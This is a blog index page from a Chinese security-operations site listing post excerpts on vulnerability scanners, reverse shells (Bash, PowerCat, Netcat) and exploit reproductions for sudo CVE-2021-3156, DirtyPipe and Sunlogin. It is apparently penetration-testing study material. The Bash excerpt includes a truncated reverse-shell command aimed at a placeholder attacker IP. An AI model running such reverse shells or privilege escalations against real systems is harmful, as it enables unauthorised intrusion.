AWVS部署-Happy峰安全运营

AWVS部署

1.AWVS简介AWVS(Acunetix Web Vulnerability Scanner)是一款知名的网络漏洞扫描工具,通过网络爬虫测试网站安全,检测流行的Web应用攻击,如跨站脚本、sql 注入等。据统计,75% 的互联网攻击...
32天前
03812
Nessus部署10.3.0-Happy峰安全运营

Nessus部署10.3.0

一、Nessus简介Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,Nes...
32天前
04113
Bash反弹shell-Happy峰安全运营

Bash反弹shell

一、Bash介绍     Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的ShellBash 反弹Shell的命令如下:bash -i >&/dev/tcp/攻击机_IP/攻击机端...
PowerCat反弹Shell-Happy峰安全运营

PowerCat反弹Shell

PowerCat介绍     PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好 用的功能,如文件上传,smb协议支持,中继模式,生成...
Netcat反弹Shell-Happy峰安全运营

Netcat反弹Shell

netcat 介绍Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作。常用参数如下:参数描述-c指定连接后要执行的shel...
开源IT资产管理软件GLPI-Happy峰安全运营

开源IT资产管理软件GLPI

 b开源IT资产管理软件GLPI介绍GLPI是法语Gestionnaire libre de parc informatique的缩写,是一款历史悠久的IT资产管理软件GLPI提供功能全面的IT资源管理接口,可以用来建立数据库全面管理...
37天前
0407
向日葵漏洞复现-Happy峰安全运营

向日葵漏洞复现

0x01 漏洞简介向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。上海贝锐信息科技股份有限公司向日葵的简约版和个人版f...
32天前
0425
sudo CVE-2021-3156 提权-Happy峰安全运营

sudo CVE-2021-3156 提权

0x01 漏洞简介 2021年1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过 -s 或 -i 命令行选项在shell模式下运行命令时,它...
32天前
02713
DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现-Happy峰安全运营

DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现

一、漏洞描述    Linux内核是操作系统的关键组件。它借助进程间通信和系统调用,在硬件级别上充当应用程序和数据处理之间的桥梁。CVE-2022-0847它是自5.8以来Linux内核中的一个漏洞,...
32天前
04213
Xray扫描器-Happy峰安全运营

Xray扫描器

Xray 是一款功能强大的安全评估工具,主要特性有:检测速度快。发包速度快; 漏洞检测算法高效。支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。代码质量高。编...
33天前
0358